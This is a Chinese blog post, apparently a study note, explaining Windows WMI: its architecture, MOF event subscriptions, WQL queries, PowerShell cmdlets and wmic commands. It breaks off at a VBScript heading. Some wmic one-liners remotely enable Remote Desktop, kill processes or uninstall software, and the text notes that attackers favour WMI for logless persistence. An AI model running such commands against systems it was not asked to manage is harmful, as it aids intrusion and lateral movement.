<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon3.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.png?v=5.1.4" color="#222">





  <meta name="keywords" content="笔记,Windows,WMI,后门," />





  <link rel="alternate" href="/atom.xml" title="Sparrow" type="application/atom+xml" />






<meta name="description" content="0x00 WMI - Windows 管理规范WMI ( Windows Management Instrumentation ) 管理规范是微软实现的由分布式管理任务组(DMTF)发布的基于Web的企业管理(WBEM)和公共信息模型(CIM)标准,是内置在 Windows 2000、Windows XP 和 Windows Server 2003 系列操作系统中核心的管理支持技术,是一种规范和">
<meta name="keywords" content="笔记,Windows,WMI,后门">
<meta property="og:type" content="article">
<meta property="og:title" content="Windows WMI技术总结">
<meta property="og:url" content="https://sp4rr0w.github.io/2019/12/04/Windows WMI技术总结/index.html">
<meta property="og:site_name" content="Sparrow">
<meta property="og:description" content="0x00 WMI - Windows 管理规范WMI ( Windows Management Instrumentation ) 管理规范是微软实现的由分布式管理任务组(DMTF)发布的基于Web的企业管理(WBEM)和公共信息模型(CIM)标准,是内置在 Windows 2000、Windows XP 和 Windows Server 2003 系列操作系统中核心的管理支持技术,是一种规范和">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/images/wmi-architecture.png">
<meta property="og:image" content="https://p3.ssl.qhimg.com/t0137317750f59275a4.jpg">
<meta property="og:image" content="https://sp4rr0w.github.io/2019/12/04/Windows%20WMI技术总结/wmi/csharp_wmi.PNG">
<meta property="og:updated_time" content="2019-12-10T06:42:35.907Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Windows WMI技术总结">
<meta name="twitter:description" content="0x00 WMI - Windows 管理规范WMI ( Windows Management Instrumentation ) 管理规范是微软实现的由分布式管理任务组(DMTF)发布的基于Web的企业管理(WBEM)和公共信息模型(CIM)标准,是内置在 Windows 2000、Windows XP 和 Windows Server 2003 系列操作系统中核心的管理支持技术,是一种规范和">
<meta name="twitter:image" content="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/images/wmi-architecture.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://sp4rr0w.github.io/2019/12/04/Windows WMI技术总结/"/>





  <title>Windows WMI技术总结 | Sparrow</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Sparrow</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://sp4rr0w.github.io/2019/12/04/Windows WMI技术总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Sparrow">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/jacksparrow.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sparrow">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Windows WMI技术总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-12-04T14:55:00-05:00">
                2019-12-04
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/技术相关/" itemprop="url" rel="index">
                    <span itemprop="name">技术相关</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/12/04/Windows WMI技术总结/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2019/12/04/Windows WMI技术总结/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2019/12/04/Windows WMI技术总结/" class="leancloud_visitors" data-flag-title="Windows WMI技术总结">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <a id="more"></a>
<h1 id="0x00-WMI-Windows-管理规范"><a href="#0x00-WMI-Windows-管理规范" class="headerlink" title="0x00 WMI - Windows 管理规范"></a>0x00 WMI - Windows 管理规范</h1><p>WMI ( Windows Management Instrumentation ) 管理规范是微软实现的由分布式管理任务组(DMTF)发布的基于Web的企业管理(WBEM)和公共信息模型(CIM)标准,是内置在 Windows 2000、Windows XP 和 Windows Server 2003 系列操作系统中核心的管理支持技术,是一种规范和基础结构,通过它可以访问、配置、管理和监视所有的几乎所有的 Windows 资源。</p>
<p>在 WMI 之前,能够以编程方式访问 Windows 资源的惟一方法就是通过 Win32 API。这种情况使 Windows 系统管理员无法通过一种简便的方法利用常见的脚本语言来自动化常用的系统管理任务,因为大多数脚本语言都不能直接调用 Win32 API。</p>
<p>WMI是架构在组件对象模型COM(Component Object Model COM)技术之上的,是微软的一套软件组件的二进制接口标准。这使得跨编程语言的进程间通信、动态对象创建成为可能。</p>
<h2 id="0x01-WMI基础结构"><a href="#0x01-WMI基础结构" class="headerlink" title="0x01 WMI基础结构"></a>0x01 WMI基础结构</h2><p><a href="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/wmi-architecture" target="_blank" rel="noopener">Objects, Consumers, and Infrastructure of WMI - WMI基础结构与WMI提供程序和受管理对象之间的关系</a></p>
<p><img src="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/images/wmi-architecture.png" alt="WMI基础结构"></p>
<p>Fireeye - WMI的结构<br><img src="https://p3.ssl.qhimg.com/t0137317750f59275a4.jpg" alt="Fireeye - WMI的结构"></p>
<h3 id="1-WMI-consumers-WMI使用者"><a href="#1-WMI-consumers-WMI使用者" class="headerlink" title="1. WMI consumers - WMI使用者"></a>1. WMI consumers - WMI使用者</h3><p>它位于WMI构架的最顶层,是WMI技术使用的载体。如果我们是C++程序员,我们可以通过COM技术直接与下层通信。而脚本语言则要支持WMI Scripting API,间接与下层通信。对于.net平台语言,则要使用System.Management域相关功能与下层通信。</p>
<p>WMI使用者是与WMI基础结构进行交互的管理应用程序或脚本。 </p>
<p>这一层是程序员能直接接触到的API层面的东西,我们可以使用C++、WMI Script脚本编写代码去操作WMI COM API对WMI进行操作</p>
<pre><code>1. C/C++ Client
2. Scripts
3. .NET Client Application
</code></pre><p>管理应用程序(或脚本)可以通过调用<a href="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/com-api-for-wmi" target="_blank" rel="noopener">WMI的COM API</a>或<a href="https://docs.microsoft.com/zh-cn/windows/win32/wmisdk/scripting-api-for-wmi" target="_blank" rel="noopener">WMI的Scripting API</a>来查询,枚举数据,运行Provider提供程序方法或订阅事件。Provider提供程序所提供的数据或操作仅可用于托管对象(例如磁盘驱动器或服务)。</p>
<h3 id="2-WMI-Infrastructure-WMI基础结构"><a href="#2-WMI-Infrastructure-WMI基础结构" class="headerlink" title="2. WMI Infrastructure - WMI基础结构"></a>2. WMI Infrastructure - WMI基础结构</h3><p>WMI基础结构是Windows系统的系统组件。它包含两个模块: </p>
<pre><code>WMI Core的WMI Service(WMI服务)(Winmgmt) - CIM Object Manager
WMI Repository(WMI存储库) - WMI namespaces(WMI命名空间) 组成
    WMI的namespace由系统自身创建和Provider创建2部分组成,例如
        1) root\default
        2) root\cimv2
        3) root\subscription
        ...
        等等由底层的Provider创建的namespace
        4) /LM/MSFTPSVC/n
简单来说,WMI Repository就相当于一个保存WMI信息的数据库,而底层的Provider所提供的信息就相当于一个个独立的数据表,在WMI中称之为命名空间namespace,我们在进行WMI查询之前,需要明确指定需要查询的namespace
</code></pre><h3 id="3-Managed-object-and-WMI-providers-托管对象和WMI提供者"><a href="#3-Managed-object-and-WMI-providers-托管对象和WMI提供者" class="headerlink" title="3. Managed object and WMI providers - 托管对象和WMI提供者"></a>3. Managed object and WMI providers - 托管对象和WMI提供者</h3><p>这是整个WMI体系的最底层,它对所有的”提供者(Provider)”提供了封装和抽象。</p>
<p>WMI提供者是监控一个或者多个托管对象的COM接口。一个托管对象是一个逻辑或者物理组件,比如硬盘驱动器、网络适配器、数据库系统、操作系统、进程或者服务。和驱动相似,WMI提供者通过托管对象提供的数据向WMI服务提供数据,同时将WMI服务的请求传递给托管对象。</p>
<p>从文件的角度来说,WMI提供者是由一个实现逻辑的DLL和承载着描述数据和操作的类的托管对象格式MOF(Managed Object Format)文件组成。这个两个文件都保存在%Windir%\System32\Wbem目录下。</p>
<h3 id="4-Winmgmt-WMI服务"><a href="#4-Winmgmt-WMI服务" class="headerlink" title="4. Winmgmt - WMI服务"></a>4. Winmgmt - WMI服务</h3><p>WMI服务是操作系统组件,充当管理应用程序(management applications 或脚本)和WMI数据提供程序(WMI data providers)之间的中介。 WMI存储库是WMI相关静态数据的存储区域。</p>
<p>它是通过一个共享的服务进程SVCHOST来实施工作的。当第一个管理应用向WMI命名空间发起连接时,WMI服务将会启动。当管理应用不再调用WMI时,WMI服务将会关闭或者进入低内存状态。</p>
<p>WMI服务和上层应用之间是通过COM接口来实现的。</p>
<pre><code>当一个应用通过接口向WMI发起请求时,WMI将判断该请求是请求静态数据还是动态数据。
如果请求的是一个静态数据,WMI将从WMI存储库中查找数据并返回；
如果请求的是一个动态数据,比如一个托管对象的当前内存情况,WMI服务将请求传递给已经在WMI服务中注册的相应的WMI提供者。
WMI提供者将数据返回给WMI服务,WMI服务再将结果返回给请求的应用。
</code></pre><h3 id="5-MOF-托管对象格式-Managed-Object-Format"><a href="#5-MOF-托管对象格式-Managed-Object-Format" class="headerlink" title="5. MOF - 托管对象格式 Managed Object Format"></a>5. MOF - 托管对象格式 Managed Object Format</h3><p>托管对象格式 Managed Object Format (MOF)是WMI数据库中类和类实例的原始保存形式,是用于描述通用信息模型(CIM)类的语言。</p>
<p>MOF 文件是一个文本文件,包含了指定的可被查询的事物的语句如该事物的名称,复杂类的字段类型,对象组相关的权限。语言的结构类似于 Java,相当于受限的 Java 接口声明。</p>
<p>WMI提供程序(Provider)实现新WMI类的推荐方法是在MOF文件中,该文件使用Mofcomp.exe编译到WMI存储库(WMI Repository)中。也可以使用WMI的COM API创建和操作CIM类和实例。</p>
<p>WMI 提供程序(Provider)通常是由提供的 MOF 文件定义的,它定义了数据和事件类和提供数据的 COM DLL 文件。</p>
<p>WMI提供程序通常包括一个MOF文件和一个DLL文件,该文件定义了提供程序为其返回数据的数据和事件类,而DLL文件则包含提供数据的代码。</p>
<p>WMI客户端脚本和应用程序(scripts and applications )可以查询提供程序MOF类(provider MOF classes)的实例或订阅以接收事件通知。</p>
<p>Windows 管理规范 (WMI) 提供了以下三种方法编译到WMI存储库的托管对象格式 (MOF) 文件: </p>
<pre><code>使用Mofcomp.exe
使用 IMofCompiler 接口和$CompileFile方法
拖放到%SystemRoot%\System32\Wbem\MOF文件夹的 MOF 文件
</code></pre><p>MOF 是一种面向对象的语言,它由以下部分组成：</p>
<pre><code>命名空间
类
属性
方法
限定符
实例
引用
注释
</code></pre><h4 id="MOF-中的命名空间"><a href="#MOF-中的命名空间" class="headerlink" title="MOF 中的命名空间"></a>MOF 中的命名空间</h4><p>要在 MOF 中声明一个 CIM 命名空间,可以使用#pragma namespace指令。通常,这个语句被发现在文件的最开始,并且会应用到同一文件内剩余部分的语句。</p>
<p>MOF 语言允许通过声明父命名空间并定义一个 __namespaceclass 的新实例来创建新的命名空间。列出的 MOF 文件创建//./ROOT/default/NewNS命名空间。</p>
<pre><code class="m">#pragma namespace(&quot;\\\\.\\ROOT\\default&quot;)
instance of __namespace
{
    Name = &quot;NewNS&quot;;
}

</code></pre>
<h4 id="mof文件记录注册表修改"><a href="#mof文件记录注册表修改" class="headerlink" title="mof文件记录注册表修改"></a>mof文件记录注册表修改</h4><p>mof文件记录注册表修改的操作,管理员权限执行mofcomp reg.mof</p>
<p>reg.mof</p>
<pre><code class="csharp">
 #pragma namespace (&quot;\\\\.\\root\\subscription&quot;)
    instance of __EventFilter as $Filter
    {
        Name = &quot;RunKeyFilter&quot;;
        QueryLanguage = &quot;WQL&quot;;
        Query = &quot;Select * from RegistryTreeChangeEvent&quot;
                &quot; where (Hive = \&quot;HKEY_LOCAL_MACHINE\&quot; and &quot;
                &quot;KeyPath = \&quot;Software\\\\Microsoft\\\\Windows&quot;
                &quot;\\\\CurrentVersion\\\\Run\&quot;)&quot;;

        // RegistryTreeChangeEvents only fire
        // in root\default namespace
        EventNamespace = &quot;root\\default&quot;;   
    };

    instance of LogFileEventConsumer as $Consumer
    {
        Name= &quot;consumer1&quot;;
        Filename = &quot;C:\test\log.log&quot;;
        Text =&quot;The change is HKEY_LOCAL_MACHINE\\%KeyPath%&quot;;

    };
    // Bind the filter to the consumer
    instance of __FilterToConsumerBinding
    {
        Filter = $Filter;
        Consumer = $Consumer;
    };


or vbs 
vbs文件记录注册表修改的操作
strComputer = &quot;.&quot;
Set objWMIService = GetObject(&quot;winmgmts:\\&quot; &amp; strComputer &amp; &quot;\root\default&quot;)
Set colEvents = objWMIService.ExecNotificationQuery _
    (&quot;SELECT * FROM RegistryKeyChangeEvent WHERE Hive=&#39;HKEY_LOCAL_MACHINE&#39; AND &quot; &amp; _
        &quot;KeyPath=&#39;SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run&#39;&quot;) 
Do
    Set objLatestEvent = colEvents.NextEvent
    Wscript.Echo Now &amp; &quot;: The registry has been modified.&quot;
Loop

</code></pre>
<h3 id="6-WMI-namespaces-命名空间"><a href="#6-WMI-namespaces-命名空间" class="headerlink" title="6. WMI namespaces 命名空间"></a>6. WMI namespaces 命名空间</h3><p>WMI的命名空间创建了一个层次结构,有点类似于我们的目录文件结构。</p>
<pre><code>1. root-作为所有其他名字的占位符；
2. root\default-与注册表操作有关的类；
3. root\security-与系统安全有关的类；
4. root\cimv2-从CIM派生的类,代表我们最常用的工作环境。
</code></pre><p>微软使用 ROOT\CIMV2 作为默认的命名空间。在下面的注册表项中包含所有 WMI 设置,也包括已定义的默认命名空间:</p>
<pre><code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM
</code></pre><p>可以使用下面的 PowerShell 代码递归查询所有的 WMI 类和它们各自的命名空间。</p>
<pre><code class="PowerShell">function Get-WmiNamespace {
    Param ($Namespace=&#39;ROOT&#39;)
    Get-WmiObject -Namespace $Namespace -Class __NAMESPACE | ForEach-Object{
        ($ns = &#39;{0}\{1}&#39; -f $_.__NAMESPACE, $_.Name)
        Get-WmiNamespace -Namespace $ns
    }

}
$WmiClasses = Get-WmiNamespace | ForEach-Object {
    $Namespace = $_
    Get-WmiObject -Namespace $Namespace -List | ForEach-Object {$_.Path.Path}
} | Sort-Object -Unique

### __Namespace :  \root namespace are two instances of __Namespace. These instances represent the \root\default, and \root\cimv2 

</code></pre>
<p>WMI的对象路径用来在CIM库中定位类和它的事例</p>
<p>对象路径用两个反斜杠\\开头,第一个元素是目标计算机的名字,第二个元素是相应的WMI命名空间,第三个元素是相应的类名,并用 : 将它与命名空间分隔开来。例如: </p>
<pre><code>\\..\root\cimv2:win32_service
</code></pre><h2 id="0x02-WMI-查询"><a href="#0x02-WMI-查询" class="headerlink" title="0x02 WMI 查询"></a>0x02 WMI 查询</h2><h3 id="1-WQL"><a href="#1-WQL" class="headerlink" title="1. WQL"></a>1. WQL</h3><p>WMI 提供了一种简单的语法用于查询 WMI 对象实例、 类和命名空间 - WMI 查询语言 (WQL)。</p>
<p>有三种类别的 WQL 查询:</p>
<pre><code>1.实例查询(Instance Queries) - 用于查询 WMI 类的实例
2.事件查询(Event Queries) - 用于一个 WMI 事件注册机制(event registration mechanism),例如 WMI 对象的创建、 删除或修改
3.元查询(Meta Queries) - 用于查询 WMI 类架构(WMI class schemas)
</code></pre><p>WQL就是WMI中的查询语言。它有如下特点: </p>
<pre><code>&gt; 每个WQL语句必须以 SELECT 开始；
&gt; SELECT 后跟你需要查询的属性名(我刚才对应SQL将其称之为字段名了),也可以像SQL一样,以*表示返回所有属性值；
&gt; FROM关键字；
&gt; 你要查询的类的名字；
&gt; 另外,如果你想精确查询结果还可以加上WHERE条件从句。比如某个类有Enable属性,你可以在查询的时候加上WHERE ENABLE=true。
</code></pre><p>语法</p>
<pre><code>SELECT properties[,properties] FROM class [where clause]
    SELECT      必选项。代表WQL语句的开始,
    properties  必选项。代表想查询的属性名字。可以是多个属性名,也可查询所有属性值,用*代替。
    FROM        必选项。跟在properties的后面。
    Class       必选项。代表想要查询的类的名称。
    where clause 可选项。where 从句和相关条件语句,用来缩小查询范围。

Win + R -&gt; wbemtest ( 系统自带的测试WMI语句的工具 )
root\cimv2 or ROOT\SecurityCenter 

    SELECT * FROM Win32_Product;
    SELECT * FROM Win32_Process;
</code></pre><p>攻击者使用wmi来进行攻击,但Windows系统默认不会在日志中记录这些操作。</p>
<p>可以做到无日志,攻击脚本无需写入到磁盘,增加了隐蔽性,越来越多的apt事件中使用WMI进行攻击(信息收集,命令执行,权限持久化等操作)。</p>
<h3 id="2-实例查询"><a href="#2-实例查询" class="headerlink" title="2. 实例查询"></a>2. 实例查询</h3><p>查询将返回 Win32_Process 类的每个实例的所有属性的名称字段中包含字符串”Chrome”的结果</p>
<pre><code>SELECT [Class property name|*] FROM [CLASS NAME] &lt;WHERE [CONSTRAINT]&gt;
SELECT * FROM Win32_Process WHERE Name LIKE &quot;%chrome%&quot;
    Win32_Process.Handle=&quot;5292&quot;
    Win32_Process.Handle=&quot;5364&quot;
    ...
</code></pre><h3 id="3-事件查询"><a href="#3-事件查询" class="headerlink" title="3. 事件查询"></a>3. 事件查询</h3><p>事件查询提供了报警机制,触发事件的类。在 WMI 类实例被创建时被用于常用的事件查询触发器。</p>
<pre><code>SELECT [Class property name|*] FROM [INTRINSIC CLASS NAME] WITHIN [POLLING INTERVAL] &lt;WHERE [CONSTRAINT]&gt;
SELECT [Class property name|*] FROM [EXTRINSIC CLASS NAME] &lt;WHERE [CONSTRAINT]&gt;

交互式用户登录的事件查询触发器

    SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA &#39;Win32_LogonSession&#39; AND TargetInstance.LogonType = 2
</code></pre><h3 id="4-元查询"><a href="#4-元查询" class="headerlink" title="4. 元查询"></a>4. 元查询</h3><p>元查询提供一个 WMI 类架构发现和检查机制。元查询采用以下形式:</p>
<pre><code>SELECT [Class property name|*] FROM [Meta_Class&lt;WHERE [CONSTRAINT]&gt;

以下查询将列出所有以字符串 &quot;Win32&quot; 开头的 WMI 类: 

    SELECT * FROM Meta_Class WHERE __Class LIKE &quot;Win32%&quot;
</code></pre><p>当执行任何 WMI 查询时,除非显式提供命名空间,否则将隐式使用默认的命名空间 ROOT\CIMV2。</p>
<h2 id="0x03-WMI-交互"><a href="#0x03-WMI-交互" class="headerlink" title="0x03 WMI 交互"></a>0x03 WMI 交互</h2><p>Microsoft和一些第三方软件开发者为我们提供了许多能够与WMI交互的工具。</p>
<pre><code>1. PowerShell
2. wmic.exe
3. wbemtest.exe
4. WMI Explorer
5. CIM Studio
6. Windows Script Host (WSH) languages : VBScript
7. C/C++ via IWbem* COM API
8. .NET using System.Management Classes 
9. winrm.exe
10. wmiexec.vbs
</code></pre><h3 id="1-PowerShell"><a href="#1-PowerShell" class="headerlink" title="1. PowerShell"></a>1. PowerShell</h3><p>PowerShell V3以下 cmdlet 可用于与 WMI 进行交互: </p>
<pre><code>Get-WmiObject
Get-CimAssociatedInstance
Get-CimClass
Get-CimInstance
Get-CimSession
Set-WmiInstance
Set-CimInstance
Invoke-WmiMethod
Invoke-CimMethod
New-CimInstance
New-CimSession
New-CimSessionOption
Register-CimIndicationEvent
Register-WmiEvent
Remove-CimInstance
Remove-WmiObject
Remove-CimSession
</code></pre><p>WMI 和 CIM 的 cmdlet 也提供了类似的功能。然而,CIM cmdlet 引入了 PowerShell V3,并通过WMI cmdlets 提供了一些额外的灵活性。</p>
<p>使用 CIM cmdlet 的最大优点是它们工作在 WinRM 和 DCOM 协议之上。WMI cmdlet 只工作在 DCOM 协议之上。</p>
<p>但是并不是所有的系统都将安装 PowerShell v3+。PowerShell v2 是默认安装在 Windows 7 上的。因此,它被攻击者视为最小公共程序。</p>
<h4 id="获取WMI对象-Get-WmiObject"><a href="#获取WMI对象-Get-WmiObject" class="headerlink" title="获取WMI对象: Get-WmiObject"></a>获取WMI对象: Get-WmiObject</h4><pre><code>Get-WmiObject -query &quot;WQL语句&quot; 
select * from win32_service where name=&#39;WinRM&#39;
    --&gt; Win32_Service.Name=&quot;WinRM&quot;
Get-WmiObject -Query &quot;select * from win32_service where name=&#39;WinRM&#39;&quot; | Format-List -Property PSComputerName, Name, ExitCode, Name, ProcessID, StartMode, State, Status

    PSComputerName : DESKTOP-S0I2B99
    Name           : WinRM
    ExitCode       : 0
    Name           : WinRM
    ProcessID      : 1496
    StartMode      : Manual
    State          : Running
    Status         : OK
</code></pre><p>在PowerShell 3.0 中,你仍然可以使用功能强大的Get-WmiObject命令,但是它们会逐渐被CIM命令所替代。</p>
<p>如果你已经在使用Get-WmiObject命令查询数据。那可以非常流畅地切换至Get-CimInstance,因为这类命令都比较类似。</p>
<p>只不过Get-CimInstance执行的结果只是名副其实的Instance,没有包含任何方法信息。</p>
<pre><code>Get-WmiObject -list # 显示所有的WMI对象(Classes)
(Get-WmiObject win32_logicaldisk | ?{$_.DeviceID -like &quot;C:&quot;}).freespace # 获取指定磁盘C盘剩余空间
Get-WmiObject win32_share | Format-list *
Get-WmiObject -list win32_*     # 获取win32_开头的对象
Get-WmiObject -query &quot;select * from win32_service where state=&#39;running&#39;&quot;
Get-WmiObject -Class win32_service  == Get-Service
Get-WmiObject Win32_Process | Where-Object {$_.name -like &quot;*explorer*&quot;}
Get-WmiObject -Namespace &quot;root\default&quot; -List # Get WMI classes in the root or default namespace of the local computer
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
wmic /NAMESPACE:&quot;root\CIMV2&quot;

remote 
    Get-WmiObject Win32_Service -Credential corp\administrator -ComputerName corp01
    (Get-WmiObject -Class Win32_Service -Filter &quot;name=&#39;WinRM&#39;&quot; -ComputerName Server01).StopService()
</code></pre><h3 id="2-wmic-exe"><a href="#2-wmic-exe" class="headerlink" title="2. wmic.exe"></a>2. wmic.exe</h3><pre><code>wmic nicconfig get ipaddress,macaddress读取ip和mac地址
wmic computersystem get username查看登录账号
wmic netlogin get name,lastlogon查看登录记录
wmic process get caption, executablepath,commandline查看进程
wmic process where name=&quot;calc.exe&quot; call terminate结束进程
wmic os get name,servicepackmajorversion 提取操作系统版本
wmic product get name,version查看软件
wmic product get caption,installdate,version
wmic product where name=&quot;name&quot; call uninstall /nointeractive   卸载
wmic share get /ALL看共享文件夹
wmic  /node:主机名  path Win32_TerminalServiceSetting where AllowTSConnections=&quot;0&quot; call SetAllowTSConnections &quot;1&quot;  开启远程
wmic nteventlog get path,filename, writeable    查看系统日文件目录
</code></pre><h3 id="3-wbemtest-exe"><a href="#3-wbemtest-exe" class="headerlink" title="3. wbemtest.exe"></a>3. wbemtest.exe</h3><p>wbemtest.exe 是一个功能强大的带有图形界面的 WMI 诊断工具。它能够枚举对象实例、执行查询、注册事件、修改 WMI 对象和类,并且可以在本地或远程去调用方法。</p>
<h3 id="4-WMI-Explorer"><a href="#4-WMI-Explorer" class="headerlink" title="4. WMI Explorer"></a>4. WMI Explorer</h3><p>WMI Explorer 是一个很好的 WMI 类发现工具。它提供了一个优雅的 GUI ,你可以使用分层次的方式探索 WMI 存储库。它也能够连接到远程的 WMI 存储库,并执行查询。</p>
<h3 id="5-CIM-Common-Information-Model"><a href="#5-CIM-Common-Information-Model" class="headerlink" title="5. CIM - Common Information Model"></a>5. CIM - Common Information Model</h3><p>通用信息模型(CIM)是可扩展的,面向对象的数据模型。 CIM是由分布式管理任务组(DMTF)维护的跨平台标准。通过WMI开发人员可以使用CIM创建代表硬盘驱动器,应用程序,网络路由器或什至用户定义的技术(例如网络空调)的类。</p>
<p>CIM Studio 是 Microsoft 遗留的一个免费工具,你可以方便地浏览 WMI 存储库。像 WMI Explorer 一样,此工具也可以很好的进行 WMI 类发现。</p>
<h3 id="6-Windows-脚本宿主-WSH-语言"><a href="#6-Windows-脚本宿主-WSH-语言" class="headerlink" title="6. Windows 脚本宿主(WSH)语言"></a>6. Windows 脚本宿主(WSH)语言</h3><p>Microsoft 提供了两个 WSH 脚本语言,VBScript 和 JScript。尽管它们比较过时,也算不上高雅的编程语言,但是说到与 WMI 进行交互时,它们的确都是功能强大的脚本语言。事实上,使用 VBScript 和 JScript 编写的利用 WMI 作为主要的 C&amp;C 机制的后门已经出现了。</p>
<p>它们是唯一支持 ActiveScriptEventConsumer 事件消费者组件的语言,该组件对于攻击者和防御者来说都是一个非常有价值的 WMI 组件。最后,从攻击的角度来看, VBScript 和 JScript 是在未安装 PowerShell 的老版本的 Windows 系统上的最小公共程序。</p>
<p><strong>VBScript</strong></p>
